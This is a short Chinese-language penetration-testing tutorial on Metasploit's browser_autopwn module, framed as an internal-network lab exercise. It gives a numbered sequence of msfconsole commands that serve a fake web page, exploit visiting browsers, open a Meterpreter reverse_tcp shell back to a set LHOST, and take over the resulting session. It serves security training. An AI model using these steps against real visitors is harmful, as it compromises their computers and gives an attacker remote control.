搜索
浏览器渗透测试原理实施browser_autopwn模块browser_autopwn是Metasploit提供的辅助功能模块。在用户访问Web页面时,它会自动攻击受害者的浏览器。在开始攻击之前,browser_autopwn能够检测用户使用的浏览器类型,browser_autopwn将根据浏览器的检测结果,自行部署最合适的exploit。准备工作在进行下一步操作之前,系统需要接入内部网络。操作步骤打开一个终端窗口,开始本示例。1.打开一个终端窗口。2.启动MSFCONSOLE。msfconsole3.搜索Autopwn模块。searchautopwn4.使用browser_autopwn模块。useauxiliary/server/browser_autopwn5.设置payload。本示例使用Windows反向TCP。setpayloadwindows/meterpreter/reverse_tcp6.显示该类型负载的选项。showoptions7.设置反向TCP连接将要连接的主机IP地址。在本示例中,IP地址是192.168.137.128。setLHOST192.168.137.1288.接下来,设置URI路径。本示例使用filetypes(连同引号一起使用)。setURIPATHfiletypes9.执行exploit。exploit10.Metasploit将模仿一个网站,其网址是http://[您设定的IP/LHOST参数]:[SRVPORT参数/默认是8080]。11.当有人访问这个网址时,browser_autopwn模块尝试连接用户的机器,并试图建立远程会话。如果成功,Meterpreter将会进行确认。使用session命令可以激活会话。session-i112.要显示我们可以运行的Meterpreter命令列表,可以使用help命令